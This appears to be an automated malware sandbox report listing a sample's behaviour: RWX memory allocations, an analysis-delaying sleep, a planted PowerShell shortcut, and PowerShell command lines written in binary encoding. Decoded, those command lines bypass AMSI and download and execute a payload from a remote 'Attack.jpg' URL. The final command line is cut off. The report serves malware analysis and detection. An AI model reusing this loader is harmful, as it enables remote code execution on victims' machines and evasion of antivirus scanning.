GET http://dreamwatchevent.com/.well-known/pki-validation/Attack.jpg

Allocates read-write-execute memory (usually to unpack itself) (50 out of 199 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 524288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02840000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02880000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72cc1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01e6a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72cc2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01e62000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01e72000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02881000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02882000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01eaa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01e73000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01e74000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ebb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01eb7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01e6b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ea2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01eb5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01e75000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01eac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01e76000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ebc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ea3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ea4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ea5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ea6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ea7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ea8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ea9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02980000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02981000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02982000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02983000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02984000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02985000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02986000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02987000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02988000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02989000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0298a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0298b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0298c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0298d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0298e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0298f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b71000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b72000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b73000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 8 p.m.	process_identifier: 2860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b74000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

A process attempted to delay the analysis task. (1 event)

description

notepad.exe tried to sleep 137 seconds, actually delayed analysis time by 137 seconds

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (4 events)

cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=(00100111,01011011,01110110,01101111,01101001,01100100,00100111,00100000,00101011,00100000,00100111,01011101,00100000,01011011,01010011,01111001,01110011,01110100,00100111,00100000,00101011,00100000,00100111,01100101,01101101,00101110,01010010,01100101,01100110,01101100,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,01101001,01101111,01101110,00101110,01000001,01110011,01110011,01100101,00100111,00100000,00101011,00100000,00100111,01101101,01100010,01101100,01111001,01011101,00111010,00111010,01001100,01101111,01100001,01100100,01010111,01101001,00100111,00100000,00101011,00100000,00100111,01110100,01101000,01010000,01100001,01110010,01110100,01101001,01100001,01101100,01001110,01100001,01101101,01100101,00101000,00100111,00100111,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00100111,00100111,00101001,00100111,01111100,01001001,01000101,01011000,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,00100100,01111001,01110010,01110100,01100111,00111101,01011011,01010010,01100101,01100110,01011101,00101110,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,00101110,01000111,01100101,01110100,01010100,01111001,01110000,01100101,00101000,00100111,01010011,01111001,00100111,00101011,00100111,01110011,01110100,01100101,01101101,00101110,00100111,00101011,00100111,01001101,01100001,01101110,01100001,00100111,00101011,00100111,01100111,01100101,01101101,00100111,00101011,00100111,01100101,01101110,01110100,00100111,00101011,00100111,00101110,01000001,01110101,01110100,01101111,01101101,00100111,00101011,00100111,01100001,01110100,01101001,01101111,00100111,00101011,00100111,01101110,00101110,01000001,00100111,00101011,00100111,01101101,00100111,00101011,00100111,01110011,01101001,00100111,00101011,00100111,01010101,01110100,01101001,01101100,01110011,00100111,00101001,00101110,01000111,01100101,01110100,01000110,01101001,01100101,01101100,01100100,00101000,00100111,01100001,00100111,00101011,00100111,01101101,01110011,00100111,00101011,00100111,01101001,01001001,00100111,00101011,00100111,01101110,01101001,01110100,01000110,01100001,00100111,00101011,00100111,01101001,01101100,01100101,01100100,00100111,00101100,00100111,01001110,01101111,01101110,00100101,01011110,00100111,00101110,01110010,01100101,01110000,01101100,01100001,01100011,01100101,00101000,00100111,00100101,01011110,00100111,00101100,00100111,01010000,01110101,01100010,00100111,00101001,00101011,00100111,01101100,01101001,01100011,00101100,01010011,00100111,00101011,00100111,01110100,01100001,01110100,01101001,01100011,00100111,00101001,00111011,00100100,01111001,01110010,01110100,01100111,00101110,01010011,01100101,01110100,01010110,01100001,01101100,01110101,01100101,00101000,00100100,01101110,01110101,01101100,01101100,00101100,00100100,01110100,01110010,01110101,01100101,00101001,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,01111100,01001001,01100000,01000101,01100000,01011000,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,01101100,01101111,01100001,01100100,01010011,01110100,01110010,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,01100100,01110010,01100101,01100001,01101101,01110111,01100001,01110100,01100011,01101000,01100101,01110110,01100101,01101110,01110100,00101110,01100011,01101111,01101101,00101111,00101110,01110111,01100101,01101100,01101100,00101101,01101011,01101110,01101111,01110111,01101110,00101111,01110000,01101011,01101001,00101101,01110110,01100001,01101100,01101001,01100100,01100001,01110100,01101001,01101111,01101110,00101111,01000001,01110100,01110100,01100001,01100011,01101011,00101110,01101010,01110000,01100111,00100111,00101001,00111011,00100100,01110010,00110111,00111000,01100110,01100100,00110000,00110000,00110000,01110011,01100100,00111101,00100000,00100100,01101101,01110110,00100000,00101101,01110011,01110000,01101100,01101001,01110100,00100000,00100111,00100101,00100111,00100000,01111100,01000110,01101111,01110010,01000101,01100001,01100011,01101000,00101101,01001111,01100010,01101010,01100101,01100011,01110100,00100000,01111011,01011011,01100011,01101000,01100001,01110010,01011101,01011011,01100010,01111001,01110100,01100101,01011101,00100010,00110000,01111000,00100100,01011111,00100010,01111101,00111011,00100100,01111001,00110101,01101010,01101000,00110110,00110010,01100100,01100110,00110000,00111101,00100000,01001001,01100000,01000101,01100000,01011000,00101000,00100100,01110010,00110111,00111000,01100110,01100100,00110000,00110000,00110000,01110011,01100100,00100000,00101101,01101010,01101111,01101001,01101110,00100000,00100111,00100111,00101001) \| %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };I`E`X([system.String]::Join('', $gf))
cmdline	powershell $gf=(00100111,01011011,01110110,01101111,01101001,01100100,00100111,00100000,00101011,00100000,00100111,01011101,00100000,01011011,01010011,01111001,01110011,01110100,00100111,00100000,00101011,00100000,00100111,01100101,01101101,00101110,01010010,01100101,01100110,01101100,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,01101001,01101111,01101110,00101110,01000001,01110011,01110011,01100101,00100111,00100000,00101011,00100000,00100111,01101101,01100010,01101100,01111001,01011101,00111010,00111010,01001100,01101111,01100001,01100100,01010111,01101001,00100111,00100000,00101011,00100000,00100111,01110100,01101000,01010000,01100001,01110010,01110100,01101001,01100001,01101100,01001110,01100001,01101101,01100101,00101000,00100111,00100111,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00100111,00100111,00101001,00100111,01111100,01001001,01000101,01011000,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,00100100,01111001,01110010,01110100,01100111,00111101,01011011,01010010,01100101,01100110,01011101,00101110,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,00101110,01000111,01100101,01110100,01010100,01111001,01110000,01100101,00101000,00100111,01010011,01111001,00100111,00101011,00100111,01110011,01110100,01100101,01101101,00101110,00100111,00101011,00100111,01001101,01100001,01101110,01100001,00100111,00101011,00100111,01100111,01100101,01101101,00100111,00101011,00100111,01100101,01101110,01110100,00100111,00101011,00100111,00101110,01000001,01110101,01110100,01101111,01101101,00100111,00101011,00100111,01100001,01110100,01101001,01101111,00100111,00101011,00100111,01101110,00101110,01000001,00100111,00101011,00100111,01101101,00100111,00101011,00100111,01110011,01101001,00100111,00101011,00100111,01010101,01110100,01101001,01101100,01110011,00100111,00101001,00101110,01000111,01100101,01110100,01000110,01101001,01100101,01101100,01100100,00101000,00100111,01100001,00100111,00101011,00100111,01101101,01110011,00100111,00101011,00100111,01101001,01001001,00100111,00101011,00100111,01101110,01101001,01110100,01000110,01100001,00100111,00101011,00100111,01101001,01101100,01100101,01100100,00100111,00101100,00100111,01001110,01101111,01101110,00100101,01011110,00100111,00101110,01110010,01100101,01110000,01101100,01100001,01100011,01100101,00101000,00100111,00100101,01011110,00100111,00101100,00100111,01010000,01110101,01100010,00100111,00101001,00101011,00100111,01101100,01101001,01100011,00101100,01010011,00100111,00101011,00100111,01110100,01100001,01110100,01101001,01100011,00100111,00101001,00111011,00100100,01111001,01110010,01110100,01100111,00101110,01010011,01100101,01110100,01010110,01100001,01101100,01110101,01100101,00101000,00100100,01101110,01110101,01101100,01101100,00101100,00100100,01110100,01110010,01110101,01100101,00101001,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,01111100,01001001,01100000,01000101,01100000,01011000,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,01101100,01101111,01100001,01100100,01010011,01110100,01110010,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,01100100,01110010,01100101,01100001,01101101,01110111,01100001,01110100,01100011,01101000,01100101,01110110,01100101,01101110,01110100,00101110,01100011,01101111,01101101,00101111,00101110,01110111,01100101,01101100,01101100,00101101,01101011,01101110,01101111,01110111,01101110,00101111,01110000,01101011,01101001,00101101,01110110,01100001,01101100,01101001,01100100,01100001,01110100,01101001,01101111,01101110,00101111,01000001,01110100,01110100,01100001,01100011,01101011,00101110,01101010,01110000,01100111,00100111,00101001,00111011,00100100,01110010,00110111,00111000,01100110,01100100,00110000,00110000,00110000,01110011,01100100,00111101,00100000,00100100,01101101,01110110,00100000,00101101,01110011,01110000,01101100,01101001,01110100,00100000,00100111,00100101,0010011